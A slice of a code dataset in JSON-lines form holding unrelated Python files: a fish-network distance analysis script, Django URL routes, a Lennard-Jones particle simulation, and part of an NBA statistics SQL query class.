np.divide(op, sum(op))\n temp_op_prob2 = (0.5*temp_op_prob)+(0.5*(1/len(op)))\n JSdivergence = (s_entropy(temp_op_prob2) - 0.5 * s_entropy(temp_op_prob) - 0.5 * np.log(len(op)))\n Comp_JS = Q_o * JSdivergence * pe\n return(Comp_JS)\n\ndef weighted_ordinal_patterns(ts, embdim, embdelay):\n time_series = ts\n possible_permutations = list(itertools.permutations(range(embdim)))\n temp_list = list()\n wop = list()\n for i in range(len(time_series) - embdelay * (embdim - 1)):\n Xi = time_series[i:(embdim+i)]\n Xn = time_series[(i+embdim-1): (i+embdim+embdim-1)]\n Xi_mean = np.mean(Xi)\n Xi_var = (Xi-Xi_mean)**2\n weight = np.mean(Xi_var)\n sorted_index_array = list(np.argsort(Xi))\n temp_list.append([''.join(map(str, sorted_index_array)), weight])\n result = pd.DataFrame(temp_list,columns=['pattern','weights'])\n freqlst = dict(result['pattern'].value_counts())\n for pat in (result['pattern'].unique()):\n wop.append(np.sum(result.loc[result['pattern']==pat,'weights'].values))\n return(wop)\n\ndef average_every_n(xvec, yvec, n=2):\n \"\"\"\n Utility function that spits out a smoothed x and y vector\n \n Parameters\n ----------\n xvec, yvec (np.array): vectors of x and y data\n n (int): average every n terms together\n \n Returns\n -------\n out_x, out_y (np.array): two smoothed vectors according to\n however many n were specified\n \"\"\"\n \n out_x = []\n out_y = []\n \n min_xdiff = xvec[1] - xvec[0]\n \n for i in range(0,len(xvec),n):\n xnumerat = 0\n ynumerat = 0\n \n if i + n <= len(xvec):\n for j in range(n):\n xnumerat += xvec[i+j]\n ynumerat += yvec[i+j]\n \n out_x.append(xnumerat / n)\n out_y.append(ynumerat / n)\n \n out_x = np.array(out_x)\n out_y = np.array(out_y)\n\n if n > 1:\n out_x = out_x + min_xdiff / n\n \n return out_x, out_y \n\n\n\n######## Here begins Danno's madness #####################\n\n\n\ndef serialDistanceMeasures(chunk, distance_measures):\n \"\"\"\n chunk = a (slice of a) dict containing all network info (eg myDict[i] = nx.read_graphml(filelist[i]))\n distance_measures = a dict of distance calculations with name as key and functions as items\n \n \"\"\"\n results = pd.DataFrame()\n for gi in list(chunk.keys())[:-1]:\n G0 = check_networks(chunk[gi])\n G1 = check_networks(chunk[gi+1])\n distances = [] \n if gi%20000==0:\n print(gi)\n for fxn in distance_measures:\n try:\n distances.append(distance_measures[fxn](G0, G1))\n except Exception as e:\n distances.append(np.nan)\n print(\"ERROR DURING DISTANCE\", e)\n ERROR_COUNT +=1\n results = results.append(pd.Series(distances, index=distance_measures.keys(), name=gi)) \n return results.sort_index() \n \n \ndef parallelProcessMyDictAsSerial(FXN, NETS, nCores, **KWARGS): \n \"\"\"\n NETS = a dictionary of networkx networks, with frame number as keys and nx.graph objects as items\n *** uses global good_dists to define which network distance measures to calculate ***\n returns a dataframe\n \"\"\"\n # SETUP PARALLEL PROCESSING\n\n ppe = ProcessPoolExecutor(nCores)\n futures = []\n Results = []\n\n #DIVIDE DATA INTO CHUNKS\n \n #BINS = list(np.arange(min(NETS.keys()), max(NETS.keys()), int(len(NETS)/nCores))) \n BINS = [int(x) for x in np.linspace(min(NETS.keys()), max(NETS.keys()), nCores+1)]\n BINS[-1] -=1 #subtract 1 because in all except the last case we add 1\n\n # INITIATE PARALLEL PROCESSES\n for n in np.arange(nCores):\n #slice NETS, adding one to the end for distance calcs\n # is there no better way than this to slice a dict?\n CHUNK = {key:NETS[key] for key in np.arange(BINS[n], BINS[n+1]+1)} \n p = ppe.submit(FXN, CHUNK, **KWARGS)\n futures.append(p)\n\n # COLLECT PROCESSED DATA AS IT IS FINISHED \n for future in as_completed(futures):\n stats = future.result()\n Results.append(stats)\n\n return pd.concat(Results)\n \n \ndef plot_network_distances(fish_dict, fish_distance):\n\n from matplotlib import gridspec\n fig = plt.figure(dpi=300, figsize=(11,13))\n ns = 10\n lw = 0.5\n ew = 1\n ncols = 5\n nrows = 11\n nv = 2\n\n\n dents = []\n for di, j in enumerate(list(range(1,len(good_dists)+1))):\n dtype = list(good_dists.keys())[di]\n \n dists_i = fish_distance[dtype]\n dents.append(p_entropy(ordinal_patterns(dists_i, 4, 1)))\n \n \n gs = gridspec.GridSpec(len(good_dists)+1, ncols, width_ratios=[1]*ncols, height_ratios=[2]+[1]*len(good_dists))\n G_f = fish_dict[min(fish_dict.keys())]\n G_f = check_networks(G_f)\n pos = nx.kamada_kawai_layout(G_f)\n pos = nx.spring_layout(G_f, pos=pos, iterations=1)\n partition = community.best_partition(G_f)\n comms = np.array([partition[i] for i in G_f.nodes()])\n node_colors_co = [colors[i] for i in comms]\n\n ginds = np.arange(min(fish_dict.keys()), len(fish_dict), int(len(fish_dict)/ncols)) + min(fish_dict.keys())\n #ginds = [1950, 1975, 2000, 2025, 2049]\n\n\n\n for i in range(ncols):\n axi = plt.subplot(gs[i])\n Gt_i = fish_dict[ginds[i]]\n partition = community.best_partition(Gt_i)\n comms = np.array([partition[i] for i in Gt_i.nodes()])\n node_colors_co = [colors[i] for i in comms]\n pos = nx.kamada_kawai_layout(Gt_i)\n pos = nx.spring_layout(Gt_i, pos=pos, iterations=1)\n\n nx.draw_networkx_nodes(Gt_i, pos, node_color=node_colors_co, edgecolors='#333333',\n node_size=ns, linewidths=lw, alpha=0.95, ax=axi)\n nx.draw_networkx_edges(Gt_i, pos, edge_color=\"#999999\", width=ew, alpha=0.35, ax=axi)\n axi.set_axis_off()\n axi.set_title(\"t = %i\"%ginds[i], fontsize=9)\n \n \n for di, j in enumerate(list(range(1,len(good_dists)+1))):\n axi = plt.subplot(gs[j,:])\n dtype = list(good_dists.keys())[di]\n \n dists_i = fish_distance[dtype]\n \n xvals = np.array(list(range(1,len(fish_dict)-2)))\n yvals = np.array(dists_i)\n yvals = (yvals-yvals.min()) / (yvals.max()-yvals.min())\n xvals, yvals = average_every_n(xvals, yvals, nv)\n \n # cc = cmo.cm.curl((yvals[:-10].mean()-yvals[:10].mean()) / 0.5) \n cval = np.array((dents-min(dents))/(max(dents)-min(dents)))\n cc = cmo.cm.thermal(cval[di]*0.85 + 0.075)\n \n axi.plot(xvals, yvals, linewidth=1.0, color='#333333')\n axi.plot(xvals, yvals, linewidth=1.0, color=cc, label=dtype, alpha=0.9)\n \n axi.legend(loc=1, framealpha=0.85)\n\n xticks = np.array(list(range(0,max(fish_dict.keys())+1,200)))\n yticks = np.linspace(0,1,3)\n axi.set_xticks(xticks)\n axi.set_yticks(yticks)\n axi.set_yticklabels(yticks, fontsize=6)\n axi.set_ylabel(r'$d(G_{t}, G_{t+1})$', fontsize=8)\n axi.set_xlim(-0.25, len(fish_dict)-1.25)\n axi.set_ylim(-0.075, 1.075)\n \n axi.grid(linewidth=1.5, color='#999999', alpha=0.3)\n \n if j != nrows-1:\n axi.set_xticklabels(['']*len(xticks))\n \n else:\n axi.set_xticklabels(xticks)\n axi.set_xlabel('Time', fontsize=14)\n\n # plt.savefig(\"../figs/pngs/sample_distances_fish.png\", dpi=425, bbox_inches='tight')\n # plt.savefig(\"../figs/pdfs/sample_distances_fish.pdf\", dpi=425, bbox_inches='tight')\n\n \n return fig\n \n\n\ntitles_of_dists = [\"JaccardDistance\", \n \"Hamming\", \n \"HammingIpsenMikhailov\", \n \"Frobenius\", \n \"PolynomialDissimilarity\", \n \"DegreeDivergence\", \n# \"dK2Distance\", \n \"PortraitDivergence\",\n# \"OnionDivergence\",\n \"QuantumJSD\",\n \"CommunicabilitySequence\", \n# \"ResilienceDistance\",\n \"ResistancePerturbation\", \n \"NetLSD\",\n \"LaplacianSpectralLorenzJSD\", \n \"LaplacianSpectralGaussianJSD\", \n \"LaplacianSpectralLorenzEuc\",\n \"IpsenMikhailov\", \n \"NonBacktrackingDistance\",\n \"DistributionalNBD\",\n \"D-measure\",\n \"DeltaCon\",\n \"NetSimile\"\n ]\n\ndist_functions={'LaplacianSpectralLorenzJSD': LJ,\\\n 'LaplacianSpectralLorenzEuc': LE,\\\n 'LaplacianSpectralGaussianJSD': NJ,\\\n 'NonBacktrackingDistance': NonBacktrackingSpectral,\\\n 'dK2Distance': dk2Distance,\\\n }\n\nadditional_dists={\n 'PolynomialDissimilarity': PolynomialDissimilarity(),\\\n 'JaccardDistance': JaccardDistance(), \\\n 'Hamming': Hamming(), \\\n 'HammingIpsenMikhailov': HammingIpsenMikhailov(), \\\n 'IpsenMikhailov': IpsenMikhailov(), \\\n 'PortraitDivergence': PortraitDivergence(), \\\n 'ResistancePerturbation': ResistancePerturbation(), \\\n 'Frobenius': Frobenius(), \\\n 'NetSimile': NetSimile(), \\\n 'DegreeDivergence': DegreeDivergence(), \\\n 'DeltaCon': DeltaCon(),\n# 'OnionDivergence': OnionDivergence(), \\\n 'DistributionalNBD': DistributionalNBD(),\\\n 'NetLSD': NetLSD(),\\\n 'QuantumJSD': QuantumJSD(),\\\n 'CommunicabilitySequence': CommunicabilityJSD(),\\\n 'D-measure': DMeasure(),\\\n# 'ResilienceDistance': ResilienceDistance(),\\\n }\n\n# place the actual functions into the dist_functions dict\nfor dist_name, dist_object in additional_dists.items():\n dist_functions[dist_name] = dist_object.dist\n \ndistances = {}\nfor title in titles_of_dists:\n distances[title] = dist_functions[title]\n\ngood_dists = {'JaccardDistance':distances['JaccardDistance'],\n# 'Hamming':distances['Hamming'], #requires constant network size\n 'DegreeDivergence':distances['DegreeDivergence'],\n 'PortraitDivergence':distances['PortraitDivergence'], #slow processing\n# 'QuantumJSD':distances['QuantumJSD'], #requires constant network size\n# 'ResistancePerturbation':distances['ResistancePerturbation'], #requires constant network size\n 'NetLSD':distances['NetLSD'],\n 'IpsenMikhailov':distances['IpsenMikhailov'],\n# 'NonBacktrackingDistance':distances['NonBacktrackingDistance'], #slow processing\n# 'D-measure':distances['D-measure'] #requires constant network size\n }\n\n\n\n\n\ncolors = [\"#91b43f\",\"#7463cd\",\"#54bc5b\",\"#c560c7\",\"#49925d\",\"#cf4085\",\"#49bfba\",\n \"#cf4d2b\",\"#6f8bce\",\"#dd862f\",\"#98558b\",\n \"#c7a745\",\"#dd85a8\", \"#777d35\",\"#c64855\",\n \"#9b5e2f\",\"#e0906e\"]\nnp.random.shuffle(colors)\n\n\n\n\n\n\n\n\n\n\n\n\nERROR_COUNT = 0\n\n\n\nif __name__ == \"__main__\":\n import argparse\n import glob\n import joblib\n import os\n \n parser = argparse.ArgumentParser(formatter_class=argparse.ArgumentDefaultsHelpFormatter)\n parser.add_argument('--dir', type=str, required=False, default='/media/recnodes/recnode_2mfish/',\n\t\t\t help='path to directory containing checker vids')\n parser.add_argument('--handle', type=str, required=True, help='unique identifier that marks the files to process. Ideally use the timestamp of the recording, ie \"20180808_153229\".')\n parser.add_argument('--ncores', type=int, required=False, default=8, \n help='provide an integer indicating the number of core processors to use for this task')\n parser.add_argument('--process_frames', type=str, required=False, default='notDefined',\n help='pass frame numbers of start and end, with a comma between eg 2000,5000')\n parser.add_argument('--skip', type=int, required=False, default=1,\n help='pass number of frames to skip for divergence calculations')\n \n args = parser.parse_args()\n HANDLE = args.handle.split(',')\n DIRECTORIES = args.dir.split(',')\n\n for x in range(len(DIRECTORIES)):\n if DIRECTORIES[x][-1] != '/':\n DIRECTORIES[x] += '/'\n \n for term in HANDLE:\n for DIR in DIRECTORIES:\n for vDir in glob.glob(DIR + '*' + term + '*.stitched'):\n if os.path.exists(vDir + '/track/graphs/000000.graphml'): \n if os.path.exists(vDir + '/track/dynamic_network_distances_' + str(args.skip)+ '.svg'):\n continue\n\n #get data\n\n filelist = []\n #FN = '/media/recnodes/recnode_2mfish/reversals3m_512_dotbot_20181017_111201.stitched'\n #FN = '/media/recnodes/recnode_2mfish/coherencetestangular3m_128_dotbot_20181009_115202.stitched'\n for fn in glob.glob( vDir + '/track/graphs/*'):\n if int(fn.split('/')[-1].split('.')[0])%args.skip == 0:\n filelist.append(fn) \n filelist = sorted(filelist)\n \n if args.process_frames == 'notDefined':\n START, END = (0, len(filelist))\n else:\n START, END = [int(x) for x in args.process_frames.split(',')]\n \n DICT_OF_NETWORKS = {}\n print(\"...Processing: \", vDir)\n print(\"....loading network graphs\")\n for i in range(START, END):#1,len(filelist)): #FIXME\n if i%1000==0:\n print(i)\n DICT_OF_NETWORKS[i] = nx.read_graphml(filelist[i])\n \"\"\"\n try: \n nx.write_graphml(DICT_OF_NETWORKS, '/home/dan/Desktop/graphs_temp.graphml')\n except:\n print( \"couldn't save\")\n pass\n \"\"\"\n #this is where we actually do the calculations: \n print(\".....calculating distance measures\")\n distances = parallelProcessMyDictAsSerial(serialDistanceMeasures, \n DICT_OF_NETWORKS, \n args.ncores, \n **{'distance_measures':good_dists}) \n distances.sort_index(inplace=True)\n distances.index *= args.skip\n #distances = doit(DICT_OF_NETWORKS, nCores=args.ncores) \n #try:\n # print(\"......saving to pickle\")\n distances.to_pickle( vDir + '/track/dynamic_network_distances_' + str(args.skip)+ '.pickle')\n joblib.dump(distances, vDir + '/track/dynamic_network_distances_' + str(args.skip)+ '.joblib')\n #now we plot it \n print(\".......plotting results\")\n fig = plot_network_distances(DICT_OF_NETWORKS, distances)\n plt.savefig(vDir + '/track/dynamic_network_distances_' + str(args.skip)+ '.svg', dpi=425, bbox_inches='tight')\n print(\"finished with \", str(ERROR_COUNT), \"errors.\")\n print(\"DONE. Find results at \", vDir + '/track')\n #plt.show()\n \n","sub_path":"dynamic_networks.py","file_name":"dynamic_networks.py","file_ext":"py","file_size_in_byte":34454,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"68"} +{"seq_id":"639673978","text":"from . import views\nfrom django.urls import path\n\nurlpatterns = [\n path('', views.Login.as_view(), name=\"Login\"),\n path('login/', views.Login.as_view(), name=\"login\"),\n path('logout/', views.logout_user, name=\"logout\"),\n path('signup/', views.signup, name=\"signup\"),\n path('reg_emp/', views.register_emp, name=\"reg_emp\"),\n path('register_man/', views.register_man, name=\"register_man\"),\n path('setting_form/', views.setting_form, name=\"setting_form\"),\n path('team_setting_form/', views.team_setting_form, name=\"team_setting_form\"),\n path('save_emp_Data/', views.save_emp_Data.as_view(), name=\"save_emp_Data\"),\n path('save_emp_goal_Data/', views.save_emp_goal_Data.as_view(), name=\"save_emp_goal_Data\"),\n path('save_team_goal_Data//', views.save_team_goal_Data, name=\"save_team_goal_Data\"),\n path('save_man_asso_Data/', views.save_man_asso_Data.as_view(), name=\"save_man_asso_Data\"),\n path('DisplayEmpData/', views.DisplayEmpData.as_view(), name=\"DisplayEmpData\"),\n path('EditDisplayEmpData/', views.EditDisplayEmpData.as_view(), name=\"EditDisplayEmpData\"),\n path('update_order//', views.updateOrder, name=\"update_order\"),\n path('delete_order///', views.deleteOrder, name=\"delete_order\"),\n path('add_emp_feedback///', views.add_emp_feedback, name=\"add_emp_feedback\"),\n path('search_emp_goal_Data/', views.search_emp_goal_Data.as_view(), name=\"search_emp_goal_Data\"),\n path('DisplayTeamData//', views.DisplayTeamData, name=\"DisplayTeamData\"),\n path('EditDisplayManAsso/', views.EditDisplayManAsso.as_view(), name=\"EditDisplayManAsso\"),\n path('DisplayTeamGoalData/', views.DisplayTeamGoalData.as_view(), name=\"DisplayTeamGoalData\"),\n path('updateTeamGoals//', views.updateTeamGoals, name=\"updateTeamGoals\"),\n path('deleteTeamGoals//', views.deleteTeamGoals, name=\"deleteTeamGoals\"),\n]\n\n","sub_path":"miss_management/urls.py","file_name":"urls.py","file_ext":"py","file_size_in_byte":1942,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"68"} +{"seq_id":"381784040","text":"# -*- coding: utf-8 -*-\r\n\"\"\"\r\nCreated on Thu Jan 24 09:55:07 2019\r\n\r\n@author: Priyanka\r\n\"\"\"\r\nimport numpy as np\r\nimport math as mt\r\nimport random\r\nimport matplotlib.pyplot as plt\r\nfrom os import path\r\n\r\ndef KE(velocities):\r\n T=0\r\n for i in range(N):\r\n T=T+ np.vdot(velocities[i],velocities[i])\r\n return T\r\n\r\ndef create_picture(positions,t):\r\n plt.cla()\r\n plt.axis([0, L, 0, L])\r\n plt.setp(plt.gca(), xticks=[0, L], yticks=[0, L])\r\n for x,y in positions:\r\n atom = plt.Circle((x, y), R, fc='r')\r\n plt.gca().add_patch(atom)\r\n # plt.savefig(path.join('HT/',\"image-{0}.png\".format(t)))\r\n\r\ndef correction(positions):\r\n for i in range(N):\r\n if positions[i][0]>L:\r\n positions[i][0]=positions[i][0]-L\r\n if positions[i][0]<0:\r\n positions[i][0]=positions[i][0]+L\r\n if positions[i][1]>L:\r\n positions[i][1]=positions[i][1]-L\r\n if positions[i][1]<0:\r\n positions[i][1]=positions[i][1]+L\r\n return positions\r\n \r\ndef acce(rel):\r\n r_val=np.dot(rel,rel)**(0.5)\r\n acc=(48/(r_val**2))*((1/r_val)**(12)-0.5*((1/r_val)**6))*rel\r\n return acc\r\n\r\ndef topology(rel):\r\n if abs(rel[0])>0.5*L:\r\n rel[0]=rel[0]-L*np.sign(rel[0])\r\n if abs(rel[1])>0.5*L:\r\n rel[1]=rel[1]-L*np.sign(rel[1])\r\n return rel\r\n \r\n \r\nN=10\r\nL=15\r\nvelocities = np.zeros((N,2))\r\npositions = np.zeros((N,2))\r\nacc=np.zeros((N,2))\r\nR=0.3\r\nRc=5\r\ndist=1.0 ##minimum seperation while generating \r\ni=0\r\n\r\nrow=0\r\ncol=0\r\nwhile(True):\r\n x=dist + dist*col\r\n y=dist + dist*row\r\n positions[i][0]=x\r\n positions[i][1]=y\r\n col+=1\r\n i=i+1\r\n if L-x= {0} AND g.season <= {1}'.format(years[0], years[1]))\n\n else:\n where_clause = add_where(where_clause, 'g.season = {0}'.format(years))\n elif modern_only:\n where_clause = add_where(where_clause, 'g.season > 1983')\n\n # add min and max date where clauses if they are provided\n if min_date:\n where_clause = add_where(where_clause, \"g.date_game >= '{}'\".format(min_date.strftime('%Y-%m-%d')))\n if max_date:\n where_clause = add_where(where_clause, \"g.date_game <= '{}'\".format(max_date.strftime('%Y-%m-%d')))\n\n # check where clause exists, then add playoffs filter to it\n # assert(where_clause != '', 'where clause not defined, must be defined at this point')\n if playoffs == 'playoffs':\n where_clause = add_where(where_clause, 'p.series_id <> 23 and p.series_id IS NOT NULL')\n playoff_table = 'LEFT JOIN playoffgames p on b.game_id = p.game_id'\n elif playoffs == 'regular':\n where_clause = add_where(where_clause, '(p.series_id = 23 or p.series_id IS NULL)')\n playoff_table = 'LEFT JOIN playoffgames p on b.game_id = p.game_id'\n else:\n playoff_table = ''\n # if neither add nothing to clause, want to return all games\n\n boxscore_columns = list(self.read_table(get_str='SHOW COLUMNS FROM boxscores').loc[:,'Field'])\n des_categories = [x for x in boxscore_columns if '_id' not in x] if categories==[] else categories\n stat_str = ', '. join(['{0}(b.{1}) AS {1}'.format(aggregator, cat) for cat in des_categories])\n\n if adv_stats:\n adv_columns = list(self.read_table(get_str='SHOW COLUMNS FROM adv_boxscores').loc[:,'Field'])\n des_adv = [x for x in adv_columns if '_id' not in x] if adv_categories==[] else adv_categories\n adv_agg = aggregator if aggregator == '' else 'AVG'\n adv_str = ','+', '. join(['{0}(a.{1}) AS {1}'.format(adv_agg, cat) for cat in des_adv])\n\n adv_table = 'LEFT JOIN adv_boxscores a ON b.game_id = a.game_id and b.player_id = a.player_id'\n\n pct_agg = aggregator if aggregator == '' else 'SUM'\n for shot_type in ['fg','fg3','ft']:\n if shot_type in des_categories and shot_type + 'a' in des_categories:\n shot_str = ', {0}(b.{1})/{0}(b.{1}a) AS {1}_pct'.format(pct_agg, shot_type)\n stat_str += shot_str\n # add fg2 stats if fg and fg3 stats are in data\n if categories == []:\n for attempt in ['', 'a']:\n stat_str += ', {0}(b.fg{1}-b.fg3{1}) AS fg2{1}'.format(aggregator, attempt)\n stat_str += ', {0}(b.fg-b.fg3)/{0}(b.fga-b.fg3a) AS fg2_pct'.format(pct_agg)\n\n if 'ast' in des_categories and 'tov' in des_categories:\n stat_str += ', {0}(b.ast)/{0}(b.tov) AS assist_tov'.format(pct_agg)\n if sum([(x in des_categories) for x in ['pts','fga','fta']]) == 3:\n stat_str += ', {0}(b.pts)/(2*({0}(b.fga)+0.44*{0}(b.fta))) as ts_pct'.format(pct_agg)\n\n if groupby == 'game_id':\n extra_group = 'g.home_pts, g.home_team_id, g.visitor_pts, g.visitor_team_id, g.date_game, '\n elif player == None and player_fields:\n extra_group = 'b.player_id, '\n extra_groupby = 'b.player_id, '\n if groupby_team:\n extra_groupby = 'b.team_id, ' + extra_groupby\n extra_group = 'b.team_id, ' + extra_group\n elif return_teams:\n extra_group = 'GROUP_CONCAT(DISTINCT b.team_id ORDER BY g.date_game ASC) AS team_ids, ' + extra_group\n no_groupby = (groupby == '' or groupby == None)\n if no_groupby:\n return_season = 'MIN(g.season) AS min_season, MAX(g.season) AS max_season, '\n else:\n return_season = 'g.season, '\n\n if aggregator == '':\n full_str = '''SELECT {0}g.season, g.date_game, {1}{4}\n FROM boxscores b\n {5}\n LEFT JOIN games g ON b.game_id = g.game_id\n {2}\n {3}\n ORDER BY g.date_game ASC'''.format(extra_group, stat_str, playoff_table, where_clause,\n adv_str, adv_table)\n else:\n full_str = '''SELECT {0}{5} COUNT(b.pts) AS game_count, {1}{6}\n FROM boxscores b\n {7}\n LEFT JOIN games g ON b.game_id = g.game_id\n {2}\n {3}\n GROUP BY {4}'''.format(extra_group, stat_str, playoff_table, where_clause,\n extra_groupby, return_season, adv_str, adv_table)\n if not no_groupby:\n full_str += '''g.{0}\n ORDER BY g.{0} ASC'''.format(groupby)\n\n to_add = ['min_season','max_season'] if no_groupby else ['season']\n self.summary_cats[self.current_summary] += to_add\n\n if not suppress_query:\n print(full_str)\n start_time = time.time()\n self.summary[self.current_summary] = self.read_table(get_str=full_str)\n print('{} SQL query takes {:.1f} seconds.'.format(self.current_summary, time.time() - start_time))\n\n if self.summary[self.current_summary].empty:\n print('{} dataframe is empty.'.format(self.current_summary))\n else:\n if return_teams and lastteam_only:\n self.summary[self.current_summary].loc[:,'team_id'] = self.summary[self.current_summary]['team_ids'].str.split(',').str[-1].astype(int)\n self.summary[self.current_summary] = self.summary[self.current_summary].drop(columns='team_ids', axis=1)\n\n if convert_ids:\n self.convert_ids('player', ['last_name','first_name','height','weight'])\n self.convert_ids('team', ['abbreviation'], column_convert={'abbreviation':'team'})\n if groupby == 'game_id':\n for home_visitor in ['home', 'visitor']:\n self.convert_ids('team', ['abbreviation'], header_override= home_visitor+ '_team_id', column_convert={'abbreviation': home_visitor + '_team'})\n self.clean_games(game_total=~team)\n\n def convert_ids(self, id_type, des_columns, column_convert=None, header_override=None, keep_id=False):\n '''Use to merge on id column of a table in the db. i.e. convert player_id to player name.\n Takes current summary df and replaces the id column with the desired columns from the given table in the database.\n\n Keyword Arguments:\n id_type - the id name, must refer to a table name and the id name of the header\n des_columns - the columns from the id table to attach to the summary df\n column_convert - a dict where keys are original header names and values are desired values. Converts any relevant header names to desired name (default None)\n keep_id - If true, will keep the id column (default None)\n '''\n id_header = id_type + '_id'\n if id_header in self.summary[self.current_summary].columns or header_override != None:\n id_df = self.read_table(id_type+'s', [id_header] + des_columns)\n left_header = id_header if header_override == None else header_override\n return_df = self.summary[self.current_summary].merge(id_df, how='left', left_on=left_header, right_on=id_header)\n if not keep_id:\n for header in [left_header, id_header]:\n if header in return_df.columns:\n return_df = return_df.drop(columns=[header])\n\n self.summary_cats[self.current_summary] += des_columns\n self.summary_cats[self.current_summary] = list(set(self.summary_cats[self.current_summary]))\n if column_convert:\n self.summary_cats[self.current_summary] = [column_convert[x] if x in column_convert.keys() else x for x in self.summary_cats[self.current_summary]]\n return_df = return_df.rename(columns=column_convert)\n columns = [x for x in return_df.columns if x not in self.summary_cats[self.current_summary]]\n self.summary[self.current_summary] = return_df[self.summary_cats[self.current_summary] + columns]\n\n def df_ids(self, df, id_type, des_columns, column_convert=None, header_override=None, keep_id=False):\n '''Use to merge on id column of a table in the db. i.e. convert player_id to player name.\n Takes df provided and replaces the id column with the desired columns from the given table in the database.\n\n Keyword Arguments:\n id_type - the id name, must refer to a table name and the id name of the header\n des_columns - the columns from the id table to attach to the summary df\n column_convert - a dict where keys are original header names and values are desired values. Converts any relevant header names to desired name (default None)\n keep_id - If true, will keep the id column (default None)\n '''\n id_header = id_type + '_id'\n assert id_header in df.columns or header_override != None, 'id_type not in df columns.'\n table_name = id_type+'s' if id_type[-1] != 's' else id_type\n id_df = self.read_table(table_name, [id_header] + des_columns)\n left_header = id_header if header_override == None else header_override\n return_df = df.merge(id_df, how='left', left_on=left_header, right_on=id_header)\n if not keep_id:\n for header in [left_header, id_header]:\n if header in return_df.columns:\n return_df = return_df.drop(columns=[header])\n\n if column_convert:\n return_df = return_df.rename(columns=column_convert)\n\n return return_df\n\n def apply_qualifiers(self, qualifiers, return_subset=True, sort_on=None, sort_asc=False, all_columns=False):\n '''Applies a dict of qualifiers to the summary df, outputing the df with only items matching the qualifiers.\n Each key should be given in a string '>10' or '<10' form.\n\n Keyword Arguments:\n qualifier - dict of qualifier column name and string qualifier\n return_subset - if True, only return the items matching qualifier, otherwise returns full df with qualifier column (default True)\n sort_on - will return the df sorted by this column, if not set will sort on the qualifier column (default None)\n sort_asc - if true, sort ascending (default False)\n all_columns - by default will only return the summary cats and the qualifier columns (default False)\n '''\n return_df = self.summary[self.current_summary].copy()\n condition_series = pd.Series()\n for column, threshold in qualifiers.items():\n if sort_on == None:\n sort_on = column\n if re.match('<|>.*', threshold):\n more_than = threshold[0] == '>'\n threshold_float = float(threshold[1:])\n else:\n more_than = False\n theshold_float = float(threshold)\n\n if more_than:\n current_series = return_df.loc[:,column] >= threshold_float\n else:\n current_series = return_df.loc[:,column] <= threshold_float\n if condition_series.empty:\n condition_series = current_series\n else:\n condition_series = condition_series & current_series\n\n current_cats = self.summary_cats[self.current_summary]\n desired_columns = current_cats + [x for x in list(qualifiers.keys()) if x not in current_cats]\n if sort_on:\n desired_columns.append(sort_on)\n\n if return_subset:\n return_df = return_df[condition_series].sort_values(sort_on, ascending=sort_asc)\n else:\n return_df.loc[:,'qualifier'] = condition_series\n desired_columns.append('qualifier')\n\n if all_columns:\n non_columns = [column for column in return_df.columns if column not in desired_columns]\n return return_df[desired_columns + non_columns]\n else:\n return return_df[desired_columns]\n\n def find_streaks(self, qualifier_dict, summary_name=None, groupby='player'):\n '''Return a df of the top streaks matching the qualifiers given\n\n Keyword Arguments:\n qualifier_dict - the dict of qualifiers to apply\n summary_name - the summary df to apply the qualifiers to, if not set use current summary df (default None)'''\n assert groupby in ['player'] or 'team' in groupby, 'Groupby must be player or team.'\n groupby_column = ['first_name', 'last_name'] if groupby=='player' else groupby\n\n if summary_name:\n self.set_summary(summary_name)\n streak_df = self.apply_qualifiers(qualifier_dict, return_subset=False, sort_on='date_game', sort_asc=True, all_columns=False).copy()\n if 'first_name' in streak_df.columns:\n streak_df.loc[:,'first_name'] = streak_df.loc[:,'first_name'].fillna('')\n streak_df = streak_df.dropna(subset=[groupby_column] if type(groupby_column) != list else groupby_column)\n\n streak_df.loc[:,'cumsum'] = streak_df.groupby(groupby_column, as_index=False).cumsum()['qualifier']\n streak_df.loc[:,'prev_total'] = streak_df.loc[:,'cumsum'].where(~streak_df.loc[:,'qualifier'], np.nan)\n streak_df.loc[:,'ffill'] = streak_df.groupby(groupby_column, as_index=False)['prev_total'].transform(lambda x: x.ffill().fillna(0))['prev_total']\n streak_df.loc[:,'cumsumffill'] = streak_df.loc[:,'cumsum'] - streak_df.loc[:,'ffill']\n streak_df.loc[:,'after'] = streak_df.groupby(groupby_column, as_index=False)['qualifier'].shift(-1)['qualifier'].fillna(False)\n streak_df.loc[:,'streak'] = streak_df.loc[:,'cumsumffill'].where(~streak_df.loc[:,'after'], 0)\n\n summary_columns = ['date_game','streak']\n if groupby == 'player':\n summary_columns = ['last_name','first_name', 'team'] + summary_columns\n else:\n summary_columns = [groupby_column] + summary_columns\n\n return_summary = streak_df[streak_df.loc[:,'streak'] > 1]\n return_summary = return_summary.sort_values('streak', ascending=False)[summary_columns].reset_index(drop=True)\n return_summary.index = return_summary.index+1\n\n return return_summary.rename(columns={'date_game':'streak_end'})\n\n def clean_games(self, summary_name=None, game_total=False):\n '''Classifies rows as home team, checks games data matches boxscore data, removes surplus columns.\n\n Keyword Argurments:\n summary_name - The summary to work on (default None)\n '''\n if summary_name != None:\n self.set_summary(summary_name)\n df = self.get_summary()\n\n if game_total:\n pts_errors = sum(df.loc[:,'pts'] != (df.loc[:,'home_pts'] + df.loc[:,'visitor_pts']))\n assert pts_errors == 0, \"{} games with points mismatch\".format(pts_errors)\n else:\n home_index = (df.loc[:,'home_team'] == df.loc[:,'team'])\n df.loc[:,'is_home'] = home_index\n\n expected_homes = sum(home_index) / len(home_index)\n\n assert expected_homes == 0.5, \"Expected 50% homes games, returned {:.2%}\".format(expected_homes)\n home_games = df[home_index]\n visitor_games = df[~home_index]\n home_errors = sum(home_games.loc[:,'pts'] != home_games.loc[:,'home_pts'])\n visitor_errors = sum(visitor_games.loc[:,'pts'] != visitor_games.loc[:,'visitor_pts'])\n assert home_errors == 0, \"{} home games with points mismatch\".format(home_errors)\n assert home_errors == 0, \"{} visitor games with points mismatch\".format(visitor_errors)\n\n remove_cols = ['home_pts','visitor_pts']\n if not game_total:\n remove_cols += ['home_team','visitor_team']\n\n df = df.drop(labels=remove_cols, axis=1)\n self.summary_cats[self.current_summary] = [x for x in self.summary_cats[self.current_summary] if x not in remove_cols]\n self.summary[self.current_summary] = df\n\n def season_games(self, seasons=(1984,2100), convert_ids=True, summary_name='games'):\n '''Reads the game data for the given season: each game's date, scores etc. Df is then stored in summary named \"games\".\n\n Keyword arguments:\n seasons - The season or min/max seasons to read games for, must be an integer or 